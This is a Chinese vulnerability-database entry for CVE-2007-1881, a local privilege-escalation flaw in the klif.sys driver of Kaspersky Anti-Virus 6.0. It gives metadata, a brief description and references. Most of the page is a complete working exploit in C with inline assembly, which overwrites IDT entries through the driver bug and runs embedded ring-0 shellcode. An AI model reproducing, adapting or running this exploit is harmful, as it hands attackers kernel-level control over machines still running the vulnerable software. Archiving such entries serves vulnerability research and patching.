Kaspersky Anti-Virus 本地权限提升漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112018 漏洞类型 未知
发布时间 2007-01-15 更新时间 2007-04-05
CVE编号 CVE-2007-1881 CNNVD-ID CNNVD-200704-104
漏洞平台 Windows CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/3131
https://www.securityfocus.com/bid/86369
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-104
|漏洞详情
工作站下的KasperskyAnti-Virus,Anti-Virus和文件服务器6.0下的Anti-Virus以及InternetSecurityMaintenancePack2build6.0.2.614之前的6.0版本的KLIF(klif.sys)中存在未明漏洞。本地用户可以借助未明向量,获得Ring-0特权。
|漏洞EXP
//	kav 6.0 0day local priv escalation exploit
//		by m4d 
//	http://unl0ck.net
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>


// r0-shellcode creates C:\Hello.txt with "Hello from ring-0! :)"

unsigned char Shellcode[405] = {
	0x55, 0x8B, 0xEC, 0x83, 0xC4, 0xBC, 0x60, 0x83, 0x4D, 0xE8, 0xFF, 0x0F, 0x01, 0x4D, 0xFA, 0x8B, 
	0x4D, 0xFC, 0x81, 0xC1, 0x50, 0x01, 0x00, 0x00, 0x66, 0x8B, 0x71, 0x06, 0xC1, 0xE6, 0x10, 0x66, 
	0x8B, 0x31, 0x4E, 0x66, 0x81, 0x3E, 0x4D, 0x5A, 0x75, 0xF8, 0x8B, 0x46, 0x3C, 0xA9, 0x00, 0xFF, 
	0xFF, 0xFF, 0x75, 0xEE, 0x81, 0x3C, 0x30, 0x50, 0x45, 0x00, 0x00, 0x75, 0xE5, 0xE8, 0x00, 0x00, 
	0x00, 0x00, 0x58, 0x8D, 0x90, 0xB7, 0x00, 0x00, 0x00, 0x8D, 0x5A, 0x58, 0x8B, 0xC6, 0x6A, 0x0D, 
	0x59, 0xFF, 0xD3, 0x89, 0x45, 0xEC, 0x03, 0xD1, 0x8B, 0xC6, 0x6A, 0x08, 0x59, 0xFF, 0xD3, 0x89, 
	0x45, 0xF0, 0x03, 0xD1, 0x8B, 0xC6, 0x6A, 0x0C, 0x59, 0xFF, 0xD3, 0x89, 0x45, 0xF4, 0x03, 0xD1, 
	0x89, 0x55, 0xE4, 0x6A, 0x20, 0x58, 0x66, 0x89, 0x45, 0xE0, 0x66, 0x89, 0x45, 0xE2, 0x8D, 0x4D, 
	0xC0, 0xC7, 0x01, 0x18, 0x00, 0x00, 0x00, 0x83, 0x61, 0x04, 0x00, 0xC7, 0x41, 0x0C, 0x00, 0x02, 
	0x00, 0x00, 0x83, 0x61, 0x10, 0x00, 0x8D, 0x45, 0xE0, 0x89, 0x41, 0x08, 0x83, 0x61, 0x14, 0x00, 
	0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x20, 0x6A, 0x03, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00, 0x8D, 0x45, 
	0xD8, 0x50, 0x8D, 0x45, 0xC0, 0x50, 0x68, 0x04, 0x00, 0x10, 0x00, 0x8D, 0x45, 0xBC, 0x50, 0xFF, 
	0x55, 0xEC, 0x85, 0xC0, 0x75, 0x2D, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x17, 0x8B, 0x45, 0xE4, 0x0F, 
	0xB7, 0x4D, 0xE0, 0x03, 0xC1, 0x50, 0x8D, 0x45, 0xD8, 0x50, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00, 
	0xFF, 0x75, 0xBC, 0xFF, 0x55, 0xF4, 0xFF, 0x75, 0xBC, 0xFF, 0x55, 0xF0, 0xC7, 0x45, 0xE8, 0xEF, 
	0xBE, 0xAD, 0xDE, 0x61, 0x8B, 0x45, 0xE8, 0xC9, 0xCF, 0x5A, 0x77, 0x43, 0x72, 0x65, 0x61, 0x74, 
	0x65, 0x46, 0x69, 0x6C, 0x65, 0x00, 0x5A, 0x77, 0x43, 0x6C, 0x6F, 0x73, 0x65, 0x00, 0x5A, 0x77, 
	0x57, 0x72, 0x69, 0x74, 0x65, 0x46, 0x69, 0x6C, 0x65, 0x00, 0x5C, 0x00, 0x3F, 0x00, 0x3F, 0x00, 
	0x5C, 0x00, 0x43, 0x00, 0x3A, 0x00, 0x5C, 0x00, 0x48, 0x00, 0x65, 0x00, 0x6C, 0x00, 0x6C, 0x00, 
	0x6F, 0x00, 0x2E, 0x00, 0x74, 0x00, 0x78, 0x00, 0x74, 0x00, 0x48, 0x65, 0x6C, 0x6C, 0x6F, 0x20, 
	0x66, 0x72, 0x6F, 0x6D, 0x20, 0x72, 0x69, 0x6E, 0x67, 0x2D, 0x30, 0x21, 0x20, 0x3A, 0x29, 0x0D, 
	0x0A, 0x60, 0x8B, 0x50, 0x3C, 0x8B, 0x54, 0x10, 0x78, 0x03, 0xD0, 0x8B, 0x5A, 0x20, 0x03, 0xD8, 
	0x33, 0xED, 0x8B, 0x4A, 0x18, 0x51, 0x8B, 0x4C, 0x24, 0x1C, 0x8B, 0x33, 0x03, 0xF0, 0x8B, 0x7C, 
	0x24, 0x18, 0xF3, 0xA6, 0x59, 0x74, 0x06, 0x45, 0x83, 0xC3, 0x04, 0xE2, 0xE8, 0x8B, 0x4A, 0x24, 
	0x03, 0xC8, 0x0F, 0xB7, 0x0C, 0x69, 0x8B, 0x6A, 0x1C, 0x03, 0xE8, 0x95, 0x03, 0x2C, 0x88, 0x89, 
	0x6C, 0x24, 0x1C, 0x61, 0xC3
};
typedef struct _FIRST_PARAM {
	ULONG	SwitchIndex;
	ULONG	Unknown;			// 0xFF0002...0xFF000F, if this parameters won't be in the list of klif.sys, sploit won't work..
	ULONG	Value;				// this value will rewrite DWORD of memory
} FIRST_PARAM, *PFIRST_PARAM;

void main(int argc, char* argv[])
{
	__try
	{
		FIRST_PARAM			Param1;
		ULONG				Param2;		// pointer to write DATA - 8
		CHAR				Idtr[6];
		CHAR				IsKAVInstalled;
		OSVERSIONINFOEX		os;


		os.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
		GetVersionEx((LPOSVERSIONINFO)&os);

		if (os.dwPlatformId != VER_PLATFORM_WIN32_NT ||
			os.dwMajorVersion != 5 ||
			os.dwMinorVersion > 1)
		{
			printf("This OS version unsupported\n");
			return;
		}

		// Äëÿ íà÷àëà îïðåäåëèì, óñòàíîâëåí ëè KAV èëè íåò

		__asm {
			cmp		os.dwMinorVersion, 0
			jnz		short $+13
			mov		eax, 0F8h		// 2k
			jmp		short $+7
			mov		eax, 11Ch		// xp
			int		2Eh

			cmp		eax, 0Ch
			setz	al
			mov		IsKAVInstalled, al
		}

		if (!IsKAVInstalled)
		{
			printf("KAV6 didn't installed\n");
			return;
		}

		Param1.SwitchIndex = 3;		// Index of jmp in case of switch()
		Param1.Unknown = 0xFF0002;

		__asm {
			pusha
			sidt	Idtr

			mov		eax, dword ptr [Idtr+2]

			add		eax, 0DAh * 8 - 8
			mov		Param2, eax

			// Write lower DWORD IdtEntry

			mov		ecx, offset Shellcode
			and		ecx, 0000FFFFh
			or		ecx, 00080000h
			mov		Param1.Value, ecx	// Set DWORD: [selector 0x0008 | LOWORD(Shellcode)]

			push	Param2
			lea		eax, Param1
			push	eax

			mov		edx, esp
			cmp		os.dwMinorVersion, 0
			jnz		short $+13
			mov		eax, 100h		// 2k
			jmp		short $+7
			mov		eax, 124h		// xp
			int		2Eh
			add		esp, 2*4

			// Write high DWORD IdtEntry

			add		Param2, 4

			mov		ecx, offset Shellcode
			and		ecx, 0FFFF0000h
			or		ecx,  0000EE00h
			mov		Param1.Value, ecx	// Set DWORD: [HIWORD(Shellcode) | gate parameters 0xEE00]

			push	Param2
			lea		eax, Param1
			push	eax

			mov		edx, esp
			cmp		os.dwMinorVersion, 0
			jnz		short $+13
			mov		eax, 100h		// 2k
			jmp		short $+7
			mov		eax, 124h		// xp
			int		2Eh
			add		esp, 2*4

			// Call Gate :-) (COLGATE)

			push	fs
			int		0DAh
			pop		fs

			popa
		}

		printf("Exploited successful\n");
	}
	__except(1) {
		printf("Can't create interrupt gate\n");
	}
}

// 15.01.07 MaD

// milw0rm.com [2007-01-15]
|参考资料

来源:www.kaspersky.com
链接:http://www.kaspersky.com/technews?id=203038694
来源:www.kaspersky.com
链接:http://www.kaspersky.com/technews?id=203038693
来源:VUPEN
名称:ADV-2007-1268
链接:http://www.frsirt.com/english/advisories/2007/1268
来源:SECUNIA
名称:24778
链接:http://secunia.com/advisories/24778
来源:OSVDB
名称:33852
链接:http://www.osvdb.org/33852